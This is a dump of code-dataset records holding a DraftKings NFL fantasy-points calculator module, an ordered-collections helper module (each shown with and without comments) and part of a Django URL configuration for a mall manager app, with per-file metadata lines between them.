RushingTouchdownsCalculator as RushingTouchdownsValueCalculator, \
RushingYardageCalculator as RushingYardageValueCalculator, \
ReceivingTouchdownsCalculator as ReceivingTouchdownsValueCalculator, \
ReceptionsCalculator as ReceptionsValueCalculator, \
KickoffsReturnTouchdownsCalculator as KickoffsReturnTouchdownsValueCalculator, \
PuntReturnTouchdownsCalculator as PuntReturnTouchdownsValueCalculator, \
FieldGoalReturnTouchdownsCalculator as FieldGoalReturnTouchdownsValueCalculator, \
FumblesLostCalculator as FumblesLostValueCalculator, \
TwoPointConversionsCaughtCalculator as TwoPointConversionsCaughtValueCalculator, \
TwoPointConversionsRushedCalculator as TwoPointConversionsRushedValueCalculator, \
TwoPointConversionsThrownCalculator as TwoPointConversionsThrownValueCalculator, \
FumbleRecoveryTouchdownsCalculator as FumbleRecoveryTouchdownsValueCalculator, \
ReceivingYardageCalculator as ReceivingYardageValueCalculator, \
PassingYardageCalculator as PassingYardageValueCalculator
passing_yardage_value_calculator = PassingYardageValueCalculator()
receiving_yardage_value_calculator = ReceivingYardageValueCalculator()
rushing_yardage_value_calculator = RushingYardageValueCalculator()
non_passing_yards_points_calculator = NonPassingYardsPointsCalculator()
class PassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
PassingTouchdownsValueCalculator(),
PassingTouchdownsPointsCalculator())
class NonPassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, NonPassingTouchdownsPointsCalculator())
class HasAchievedAtLeast300PassingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=passing_yardage_value_calculator,
minimum_inclusive_required_yardage=300
),
HasAchievedAtLeast300PassingYardsPointsCalculator()
)
class PassingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
passing_yardage_value_calculator,
PassingYardagePointsCalculator())
class TurnoversCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TurnoversPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TurnoversCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class InterceptionsCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(InterceptionsValueCalculator())
class RushingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(RushingTouchdownsValueCalculator())
class RushingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
rushing_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsRushingPointsLimit(
StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=rushing_yardage_value_calculator,
minimum_inclusive_required_yardage=100
),
HasAchievedAtLeast100YardsPointsCalculator()
)
class ReceivingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(ReceivingTouchdownsValueCalculator())
class ReceivingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
receiving_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsReceivingCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
value_calculator=HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=receiving_yardage_value_calculator,
minimum_inclusive_required_yardage=100),
points_calculator=HasAchievedAtLeast100YardsPointsCalculator())
class ReceptionsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(ReceptionsValueCalculator(), ReceptionsPointsCalculator())
class PuntReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(PuntReturnTouchdownsValueCalculator())
class KickReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(KickoffsReturnTouchdownsValueCalculator())
class FieldGoalReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FieldGoalReturnTouchdownsValueCalculator())
class FumblesLostCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(FumblesLostValueCalculator())
class TwoPointConversionCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TwoPointConversionsPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TwoPointConversionCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class TwoPointConversionsThrownCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsThrownValueCalculator())
class TwoPointConversionsCaughtCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsCaughtValueCalculator())
class TwoPointConversionsRushedCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsRushedValueCalculator())
class FumbleRecoveryTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FumbleRecoveryTouchdownsValueCalculator())
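# --- Illustrative usage (not from the original module) ---
# Every class above simply pairs a statistical-value calculator with a
# value-to-points calculator via StatisticalCategoryPointsCalculator, so a
# hypothetical call site only has to pick the category:
#
#     calculator = PassingTouchdownsCalculator()
#     points = calculator.calculate(statistics)
#
# The method name 'calculate' is assumed here; the real entry point is
# defined on StatisticalCategoryPointsCalculator in the core package and
# may be named differently.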
| 41.578947
| 116
| 0.797089
|
from daily_fantasy_sports_scoring_calculators.core.calculators.scoring import StatisticalCategoryPointsCalculator, \
StatisticalValueCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.scoring.calculators.value_to_points.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsPointsCalculator, \
HasAchievedAtLeast300YardsCalculator as HasAchievedAtLeast300PassingYardsPointsCalculator, \
PassingYardageCalculator as PassingYardagePointsCalculator, \
HasAchievedAtLeast100YardsCalculator as HasAchievedAtLeast100YardsPointsCalculator, \
NonPassingTouchdownsCalculator as NonPassingTouchdownsPointsCalculator, \
NonPassingYardsCalculator as NonPassingYardsPointsCalculator, \
TurnoversCalculator as TurnoversPointsCalculator, \
TwoPointConversionsCalculator as TwoPointConversionsPointsCalculator, \
ReceptionsCalculator as ReceptionsPointsCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.statistics.calculators.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsValueCalculator, \
HasAchievedMinimumYardageRequirementCalculator as HasAchievedMinimumYardageRequirementValueCalculator, \
InterceptionsCalculator as InterceptionsValueCalculator, \
RushingTouchdownsCalculator as RushingTouchdownsValueCalculator, \
RushingYardageCalculator as RushingYardageValueCalculator, \
ReceivingTouchdownsCalculator as ReceivingTouchdownsValueCalculator, \
ReceptionsCalculator as ReceptionsValueCalculator, \
KickoffsReturnTouchdownsCalculator as KickoffsReturnTouchdownsValueCalculator, \
PuntReturnTouchdownsCalculator as PuntReturnTouchdownsValueCalculator, \
FieldGoalReturnTouchdownsCalculator as FieldGoalReturnTouchdownsValueCalculator, \
FumblesLostCalculator as FumblesLostValueCalculator, \
TwoPointConversionsCaughtCalculator as TwoPointConversionsCaughtValueCalculator, \
TwoPointConversionsRushedCalculator as TwoPointConversionsRushedValueCalculator, \
TwoPointConversionsThrownCalculator as TwoPointConversionsThrownValueCalculator, \
FumbleRecoveryTouchdownsCalculator as FumbleRecoveryTouchdownsValueCalculator, \
ReceivingYardageCalculator as ReceivingYardageValueCalculator, \
PassingYardageCalculator as PassingYardageValueCalculator
passing_yardage_value_calculator = PassingYardageValueCalculator()
receiving_yardage_value_calculator = ReceivingYardageValueCalculator()
rushing_yardage_value_calculator = RushingYardageValueCalculator()
non_passing_yards_points_calculator = NonPassingYardsPointsCalculator()
class PassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
PassingTouchdownsValueCalculator(),
PassingTouchdownsPointsCalculator())
class NonPassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, NonPassingTouchdownsPointsCalculator())
class HasAchievedAtLeast300PassingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=passing_yardage_value_calculator,
minimum_inclusive_required_yardage=300
),
HasAchievedAtLeast300PassingYardsPointsCalculator()
)
class PassingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
passing_yardage_value_calculator,
PassingYardagePointsCalculator())
class TurnoversCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TurnoversPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TurnoversCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class InterceptionsCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(InterceptionsValueCalculator())
class RushingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(RushingTouchdownsValueCalculator())
class RushingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
rushing_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsRushingPointsLimit(
StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=rushing_yardage_value_calculator,
minimum_inclusive_required_yardage=100
),
HasAchievedAtLeast100YardsPointsCalculator()
)
class ReceivingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(ReceivingTouchdownsValueCalculator())
class ReceivingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
receiving_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsReceivingCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
value_calculator=HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=receiving_yardage_value_calculator,
minimum_inclusive_required_yardage=100),
points_calculator=HasAchievedAtLeast100YardsPointsCalculator())
class ReceptionsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(ReceptionsValueCalculator(), ReceptionsPointsCalculator())
class PuntReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(PuntReturnTouchdownsValueCalculator())
class KickReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(KickoffsReturnTouchdownsValueCalculator())
class FieldGoalReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FieldGoalReturnTouchdownsValueCalculator())
class FumblesLostCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(FumblesLostValueCalculator())
class TwoPointConversionCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TwoPointConversionsPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TwoPointConversionCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class TwoPointConversionsThrownCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsThrownValueCalculator())
class TwoPointConversionsCaughtCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsCaughtValueCalculator())
class TwoPointConversionsRushedCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsRushedValueCalculator())
class FumbleRecoveryTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FumbleRecoveryTouchdownsValueCalculator())
| true
| true
|
f707c9bae6d69a9013fae62fea2c4855ede04e46
| 13,339
|
py
|
Python
|
utils/orderedcollections.py
|
orionzhou/biolib
|
940fb66f1b2608d34a2d00ebdf41dc84c6381f42
|
[
"BSD-2-Clause"
] | 3
|
2019-02-22T20:35:23.000Z
|
2021-11-25T10:01:50.000Z
|
utils/orderedcollections.py
|
orionzhou/biolib
|
940fb66f1b2608d34a2d00ebdf41dc84c6381f42
|
[
"BSD-2-Clause"
] | null | null | null |
utils/orderedcollections.py
|
orionzhou/biolib
|
940fb66f1b2608d34a2d00ebdf41dc84c6381f42
|
[
"BSD-2-Clause"
] | 1
|
2021-02-19T03:10:14.000Z
|
2021-02-19T03:10:14.000Z
|
# Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from urllib.parse import parse_qsl
from collections import defaultdict
from collections.abc import Callable
try:
    from UserDict import UserDict
    from UserDict import DictMixin
except ImportError:
    from collections import UserDict
    from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
        if last:
            key = next(reversed(self))
        else:
            key = next(iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
#iterkeys = DictMixin.iterkeys
#itervalues = DictMixin.itervalues
#iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
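# --- Illustrative usage (not part of the original recipe) ---
#     d = OrderedDict()
#     d['b'] = 1; d['a'] = 2; d['c'] = 3
#     list(d)                ->  ['b', 'a', 'c']  # insertion order preserved
#     d.popitem()            ->  ('c', 3)         # pops from the end by default
#     d.popitem(last=False)  ->  ('b', 1)         # or from the front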
"""
<http://stackoverflow.com/questions/6190331/can-i-do-an-ordered-default-dict-in-python>
"""
class DefaultOrderedDict(OrderedDict):
def __init__(self, default_factory=None, *a, **kw):
if (default_factory is not None and
not isinstance(default_factory, Callable)):
raise TypeError('first argument must be callable')
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = self.default_factory,
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory,
copy.deepcopy(self.items()))
def __repr__(self):
        return 'DefaultOrderedDict(%s, %s)' % (self.default_factory,
                                               OrderedDict.__repr__(self))
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, keep_attr_order=True):
"""
Kind of like urlparse.parse_qs, except returns an ordered dict.
Also avoids replicating that function's bad habit of overriding the
built-in 'dict' type.
Taken from below with modification:
<https://bitbucket.org/btubbs/thumpy/raw/8cdece404f15/thumpy.py>
"""
od = DefaultOrderedDict(list) if keep_attr_order else defaultdict(list)
    for name, value in parse_qsl(qs, keep_blank_values, strict_parsing):
od[name].append(value)
return od
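# --- Illustrative usage (not part of the original module) ---
# With keep_attr_order=True (the default), parameters keep the order in
# which they first appear, and repeated names accumulate into lists:
#
#     od = parse_qs('b=1&a=2&b=3')
#     list(od.items())  ->  [('b', ['1', '3']), ('a', ['2'])]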
"""
Recipe from <http://code.activestate.com/recipes/577197-sortedcollection/>.
"""
from bisect import bisect_left, bisect_right
class SortedCollection(object):
'''Sequence sorted by a key function.
SortedCollection() is much easier to work with than using bisect() directly.
    It supports key functions like those used in sorted(), min(), and max().
The result of the key function call is saved so that keys can be searched
efficiently.
Instead of returning an insertion-point which can be hard to interpret, the
five find-methods return a specific item in the sequence. They can scan for
exact matches, the last item less-than-or-equal to a key, or the first item
greater-than-or-equal to a key.
Once found, an item's ordinal position can be located with the index() method.
New items can be added with the insert() and insert_right() methods.
Old items can be deleted with the remove() method.
The usual sequence methods are provided to support indexing, slicing,
length lookup, clearing, copying, forward and reverse iteration, contains
checking, item counts, item removal, and a nice looking repr.
Finding and indexing are O(log n) operations while iteration and insertion
are O(n). The initial sort is O(n log n).
    The key function is stored in the 'key' attribute for easy introspection or
so that you can assign a new key function (triggering an automatic re-sort).
In short, the class was designed to handle all of the common use cases for
bisect but with a simpler API and support for key functions.
>>> from pprint import pprint
>>> from operator import itemgetter
>>> s = SortedCollection(key=itemgetter(2))
>>> for record in [
... ('roger', 'young', 30),
... ('angela', 'jones', 28),
... ('bill', 'smith', 22),
... ('david', 'thomas', 32)]:
... s.insert(record)
>>> pprint(list(s)) # show records sorted by age
[('bill', 'smith', 22),
('angela', 'jones', 28),
('roger', 'young', 30),
('david', 'thomas', 32)]
>>> s.find_le(29) # find oldest person aged 29 or younger
('angela', 'jones', 28)
>>> s.find_lt(28) # find oldest person under 28
('bill', 'smith', 22)
>>> s.find_gt(28) # find youngest person over 28
('roger', 'young', 30)
>>> r = s.find_ge(32) # find youngest person aged 32 or older
>>> s.index(r) # get the index of their record
3
>>> s[3] # fetch the record at that index
('david', 'thomas', 32)
>>> s.key = itemgetter(0) # now sort by first name
>>> pprint(list(s))
[('angela', 'jones', 28),
('bill', 'smith', 22),
('david', 'thomas', 32),
('roger', 'young', 30)]
'''
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
'Find the position of an item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
'Return number of occurrences of item'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
'Insert a new item. If equal keys are found, add to the left'
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
'Insert a new item. If equal keys are found, add to the right'
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
        'Remove first occurrence of item. Raise ValueError if not found'
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, item):
'Return first item with a key == item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, item):
'Return last item with a key <= item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_right(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, item):
'Return last item with a key < item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, item):
        'Return first item with a key >= item. Raise ValueError if not found'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, item):
'Return first item with a key > item. Raise ValueError if not found'
k = self._key(item)
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))
| 33.3475
| 87
| 0.605518
|
from urllib.parse import parse_qsl
from collections import defaultdict
from collections.abc import Callable
try:
    from UserDict import UserDict
    from UserDict import DictMixin
except ImportError:
    from collections import UserDict
    from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
        end += [None, end, end]
        self.__map = {}
        dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
        if last:
            key = next(reversed(self))
        else:
            key = next(iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
class DefaultOrderedDict(OrderedDict):
def __init__(self, default_factory=None, *a, **kw):
if (default_factory is not None and
not isinstance(default_factory, Callable)):
raise TypeError('first argument must be callable')
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = self.default_factory,
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory,
copy.deepcopy(self.items()))
def __repr__(self):
        return 'DefaultOrderedDict(%s, %s)' % (self.default_factory,
                                               OrderedDict.__repr__(self))
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, keep_attr_order=True):
od = DefaultOrderedDict(list) if keep_attr_order else defaultdict(list)
    for name, value in parse_qsl(qs, keep_blank_values, strict_parsing):
od[name].append(value)
return od
from bisect import bisect_left, bisect_right
class SortedCollection(object):
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, item):
k = self._key(item)
i = bisect_right(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, item):
k = self._key(item)
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))
| true
| true
|
f707ca2e53757b03d3bb7f1b28158ce7a33af228
| 1,519
|
py
|
Python
|
manager_app/urls.py
|
syz247179876/e_mall
|
f94e39e091e098242342f532ae371b8ff127542f
|
[
"Apache-2.0"
] | 7
|
2021-04-10T13:20:56.000Z
|
2022-03-29T15:00:29.000Z
|
manager_app/urls.py
|
syz247179876/E_mall
|
f94e39e091e098242342f532ae371b8ff127542f
|
[
"Apache-2.0"
] | 9
|
2021-05-11T03:53:31.000Z
|
2022-03-12T00:58:03.000Z
|
manager_app/urls.py
|
syz247179876/E_mall
|
f94e39e091e098242342f532ae371b8ff127542f
|
[
"Apache-2.0"
] | 2
|
2020-11-24T08:59:22.000Z
|
2020-11-24T14:10:59.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2021/2/10 12:59 PM
# @Author : 司云中
# @File : urls.py
# @Software: Pycharm
from django.conf import settings
from django.urls import path, include
from manager_app.apis.auth_api import ManagerLoginApiView, ManagerRegisterApiView
from manager_app.apis.manage_carousel_api import ManageCarouselApiView
from manager_app.apis.manage_commodity_api import ManagerCommodityCategoryApiView, ManageCommodityGroupApiView
from manager_app.apis.manage_permission_api import ManagePermissionApiView
from manager_app.apis.manage_role_api import ManageRoleApiView
from manager_app.apis.manage_seller_api import ManagerSellerPermApiView, ManagerSellerRoleApiView
app_name = "manager_app"
auth_patterns = [
path('login/', ManagerLoginApiView.as_view()),
path('register/', ManagerRegisterApiView.as_view()),
]
urlpatterns = [
path(f'{settings.URL_PREFIX}/auth/', include(auth_patterns)),
path(f'{settings.URL_PREFIX}/role/', ManageRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/', ManagePermissionApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-category/', ManagerCommodityCategoryApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-group/', ManageCommodityGroupApiView.as_view()),
